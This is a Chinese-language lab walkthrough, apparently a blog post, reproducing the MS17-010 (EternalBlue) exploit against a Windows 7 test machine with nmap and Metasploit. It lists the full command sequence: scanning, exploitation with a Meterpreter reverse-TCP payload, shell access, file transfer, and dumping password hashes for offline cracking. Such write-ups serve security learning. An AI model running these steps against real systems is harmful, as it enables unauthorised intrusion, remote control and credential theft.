渗透测试-MS17-010(永恒之蓝)漏洞复现
环境介绍
攻击机:Kali-Linux IP:192.168.16.130
靶机:Windows7 IP:192.168.16.131
工具使用
Nmap扫描工具:
网络扫描工具,准确探测单台主机的详细情况,对大范围的IP地主段扫描。扫描目标网络上有哪些主机上存活的,哪些服务是开放的,甚至可能知道网络中使用何种类型的防火墙设备
Metasploit框架:
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具。
复现过程
- 进入kali终端,进入管理员权限,同时使用nmap工具(kali自带)扫描端口信息
sudo su
nmap -T4 -A -v -Pn 192.168.16.131/24
nmap扫描工具中 -A 选项用于使用进攻性方式扫描;
-T4 指定扫描过程使用的时序,总共有6个级别(0-5),级别越高,速度越快,但也容易被防火墙发现;
-v 表示显示冗余信息,在扫描过程中显示扫描的细节;
-Pn 在扫描之前,不发送ICMP echo请求测试目标是否存活;
nmap常用命令可参考如下:
nmap扫描常用命令详解_鹿鸣天涯的博客-CSDN博客
- 启动msf,启动Metasploit框架
msfconsole
- 搜索ms17-010模块
search ms17-010
其中exploit为攻击模块,auxiliary为辅助模块
- 使用3模块,检查漏洞是否存在,同时检查参数
use 3
show options
Required中显示yes为必填项
- 设置rhosts目标IP,同时查看参数
set rhosts 192.168.16.131
show options
- 运行扫描模块
run
存在ms17-010!后续进行攻击~
- 使用攻击模块
use 0
查看参数show options,并设置参数;
其中payload为攻击载荷,为目标系统在被渗透攻击之后去执行的代码,这里采用默认;
lhost为攻击者,即kali攻击机;
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.16.131
set lhost 192.168.16.130
- 设置完成后进行攻击
run
- 攻击成功后则使用meterpreter进行后渗透操作
Meterpreter可提供驻内存免杀能力高级后门工具,特权提升、跳板攻击与内网拓展等
- 进行屏幕截图screenshot,图片名如下:
screenshot
- Upload进行上传操作,将该照片上传到win7C盘目录下,注意使用双
upload /home/kali/vdgNGLiI.jpeg c:\
- Download进行下载操作,在win7C盘新建1..txt文件,下载到kali系统文件中
download c:\1..txt /home/kali
- 在kali文件打开txt如下:
- 查看权限
windows:getuid
linux:whoami
getuid
得知为管理员权限
- 利用shell进去win7系统,对靶机win7进行控制
shell
- Chcp 65001进行改变乱码
chcp 65001
- 在windows系统中使用ipconfig命令查看ip地址,为192.168.16.131,与前一致
ipconfig
- 使用dir命令查看文件目录
dir
- 使用命令exit可以退出该系统
exit
- 使用hashdump命令可以导出目标数据库中用户信息
hashdump
其中后续信息为账号密码,可在cmd5在线解密平台进行破译
以上内容为MS17-010(永恒之蓝)漏洞复现
声明
以上内容仅代表作者个人学习观点,供学习参考